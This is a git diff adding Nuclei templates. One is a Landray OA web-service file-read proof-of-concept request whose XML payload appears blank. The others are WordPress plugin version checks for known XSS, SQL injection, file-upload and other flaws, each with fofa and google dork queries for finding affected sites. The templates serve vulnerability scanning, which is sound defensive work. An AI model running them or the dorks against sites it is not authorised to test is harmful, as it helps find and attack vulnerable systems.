lanling-oa-hrstaffwebservice-fileread + +info: + name: lanling-oa-hrstaffwebservice-fileread + author: PokerSec + severity: high + metadata: + fofasearch: body="Com_Parameter" + +variables: + boundary: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /sys/webservice/hrStaffWebService HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/related; boundary=----{{boundary}} + SOAPAction: "" + + ------{{boundary}} + Content-Disposition: form-data; name="a" + + + + + + + a + + + + + + ------{{boundary}}-- + + matchers: + - type: dsl + dsl: + - status_code==500 && contains_all(body,"") && contains_all(body,"Unmarshalling Error") \ No newline at end of file diff --git a/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml b/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml new file mode 100644 index 0000000000..60a2a811ad --- /dev/null +++ b/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml @@ -0,0 +1,59 @@ +id: webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + google-query: inurl:"/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,webd-woocommerce-product-excel-importer-bulk-edit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "webd-woocommerce-product-excel-importer-bulk-edit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.6') \ No newline at end of file diff --git a/poc/wordpress/indeed-wp-superbackup.yaml b/poc/wordpress/indeed-wp-superbackup.yaml new file mode 100644 index 0000000000..56b18b8b9e --- /dev/null +++ b/poc/wordpress/indeed-wp-superbackup.yaml @@ -0,0 +1,59 @@ +id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1 + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/wordpress/jlayer-parallax-slider-wp.yaml b/poc/wordpress/jlayer-parallax-slider-wp.yaml new file mode 100644 index 0000000000..54f299499e --- /dev/null +++ b/poc/wordpress/jlayer-parallax-slider-wp.yaml @@ -0,0 +1,59 @@ +id: jlayer-parallax-slider-wp-8ff10f61dea7350124b039f1e92690b4 + +info: + name: > + jLayer Parallax Slider <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33e5ca87-2e45-4b85-818e-02093bbf66ee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jlayer-parallax-slider-wp/" + google-query: inurl:"/wp-content/plugins/jlayer-parallax-slider-wp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jlayer-parallax-slider-wp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jlayer-parallax-slider-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jlayer-parallax-slider-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/wordpress/jwp-a11y.yaml b/poc/wordpress/jwp-a11y.yaml new file mode 100644 index 0000000000..cb3ec3c829 --- /dev/null +++ b/poc/wordpress/jwp-a11y.yaml @@ -0,0 +1,59 @@ +id: jwp-a11y-83352b6551092dd47080d7d2a29a35ff + +info: + name: > + jwp-a11y <= 4.1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d0da23a-12e6-4e57-8413-dc86a62b1800?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jwp-a11y/" + google-query: inurl:"/wp-content/plugins/jwp-a11y/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jwp-a11y,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jwp-a11y/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jwp-a11y" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.7') \ No newline at end of file diff --git a/poc/wordpress/real-wp-shop-lite.yaml b/poc/wordpress/real-wp-shop-lite.yaml new file mode 100644 index 0000000000..452f74fed4 --- /dev/null +++ b/poc/wordpress/real-wp-shop-lite.yaml @@ -0,0 +1,59 @@ +id: real-wp-shop-lite-91a45dec7983fa3e47682bea55d7171d + +info: + name: > + Real WP Shop Lite Ajax eCommerce Shopping Cart <= 2.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd75955-3c9e-4cac-b952-f705a2129707?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/real-wp-shop-lite/" + google-query: inurl:"/wp-content/plugins/real-wp-shop-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,real-wp-shop-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/real-wp-shop-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "real-wp-shop-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.8') \ No newline at end of file diff --git a/poc/wordpress/users-import-export-with-excel-for-wp.yaml b/poc/wordpress/users-import-export-with-excel-for-wp.yaml new file mode 100644 index 0000000000..ce5f21377c --- /dev/null +++ b/poc/wordpress/users-import-export-with-excel-for-wp.yaml @@ -0,0 +1,59 @@ +id: users-import-export-with-excel-for-wp-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/users-import-export-with-excel-for-wp/" + google-query: inurl:"/wp-content/plugins/users-import-export-with-excel-for-wp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,users-import-export-with-excel-for-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/users-import-export-with-excel-for-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "users-import-export-with-excel-for-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml b/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml new file mode 100644 index 0000000000..5e9793a957 --- /dev/null +++ b/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml @@ -0,0 +1,59 @@ +id: wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5 + +info: + name: > + WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More <= 2.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-ad-guru/" + google-query: inurl:"/wp-content/plugins/wp-ad-guru/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-ad-guru,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-ad-guru/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-ad-guru" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/poc/wordpress/wp-auctions.yaml b/poc/wordpress/wp-auctions.yaml new file mode 100644 index 0000000000..5bfeb3fd4e --- /dev/null +++ b/poc/wordpress/wp-auctions.yaml @@ -0,0 +1,59 @@ +id: wp-auctions-89ead7db0eb36d917e5bca365b6051f0 + +info: + name: > + WordPress Auction Plugin <= 3.7 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c240829-0672-4ac2-b49a-2068a0a549f1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-auctions/" + google-query: inurl:"/wp-content/plugins/wp-auctions/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-auctions,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-auctions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7') \ No newline at end of file diff --git a/poc/wordpress/wp-donimedia-carousel.yaml b/poc/wordpress/wp-donimedia-carousel.yaml new file mode 100644 index 0000000000..06f21ffec5 --- /dev/null +++ b/poc/wordpress/wp-donimedia-carousel.yaml @@ -0,0 +1,59 @@ +id: wp-donimedia-carousel-3ee6db1ee25b24e0072c18227982adb0 + +info: + name: > + WP donimedia carousel <= 1.0.1 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff09292b-c8a6-4cd8-a8dd-d79b4c713d6f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-donimedia-carousel/" + google-query: inurl:"/wp-content/plugins/wp-donimedia-carousel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-donimedia-carousel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-donimedia-carousel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-donimedia-carousel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml b/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml new file mode 100644 index 0000000000..866fe15a03 --- /dev/null +++ b/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360 + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Unauthenticated Arbitrary Resume Download + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc87d5f-dba4-40f8-946f-f2634614b579?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml b/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml new file mode 100644 index 0000000000..652a16d255 --- /dev/null +++ b/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-44ca926d802c7e810b6f185672896cf3 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml b/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml new file mode 100644 index 0000000000..60fb2ce84d --- /dev/null +++ b/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via wpjobportal_deactivate() + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4d67675a-b77b-41c6-a94f-d9385e609b37?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml b/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml new file mode 100644 index 0000000000..f3788c4695 --- /dev/null +++ b/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-ae4beac744bf60cad4d49b935292f33a + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Limited Privilege Escalation + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4107199d-e3c7-4379-b39d-1868de7d777b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml b/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml new file mode 100644 index 0000000000..9fe7706c2e --- /dev/null +++ b/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd + +info: + name: > + WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml b/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml new file mode 100644 index 0000000000..01b3fb98c8 --- /dev/null +++ b/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-fa33fbce4070912e4a2de446cc7f9493 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox() + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/505858dc-c420-484c-a067-6962836eea6a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml b/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml new file mode 100644 index 0000000000..bb5a5ba466 --- /dev/null +++ b/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml @@ -0,0 +1,59 @@ +id: wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b + +info: + name: > + Wp photo text slider 50 <= 8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f98f11da-b0ae-4c00-9708-88d6044abda2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-photo-text-slider-50/" + google-query: inurl:"/wp-content/plugins/wp-photo-text-slider-50/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-photo-text-slider-50,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-photo-text-slider-50/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-photo-text-slider-50" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.1') \ No newline at end of file diff --git a/poc/wordpress/wp-tithely.yaml b/poc/wordpress/wp-tithely.yaml new file mode 100644 index 0000000000..c844b1c49d --- /dev/null +++ b/poc/wordpress/wp-tithely.yaml @@ -0,0 +1,59 @@ +id: wp-tithely-fa54958de0b95d943c97eef399cbadee + +info: + name: > + Tithe.ly Giving Button <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/569f2250-971a-4000-9114-67e609ec907d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-tithely/" + google-query: inurl:"/wp-content/plugins/wp-tithely/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-tithely,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-tithely/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-tithely" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/wordpress/wpcasa.yaml b/poc/wordpress/wpcasa.yaml new file mode 100644 index 0000000000..c11a789eef --- /dev/null +++ b/poc/wordpress/wpcasa.yaml @@ -0,0 +1,59 @@ +id: wpcasa-639a6c2d23467f866364578ced73357f + +info: + name: > + WPCasa <= 1.2.13 - Insecure Direct Object Reference + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1e5030-fb78-47da-b571-048b97c9ff9e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpcasa/" + google-query: inurl:"/wp-content/plugins/wpcasa/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpcasa,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpcasa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpcasa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file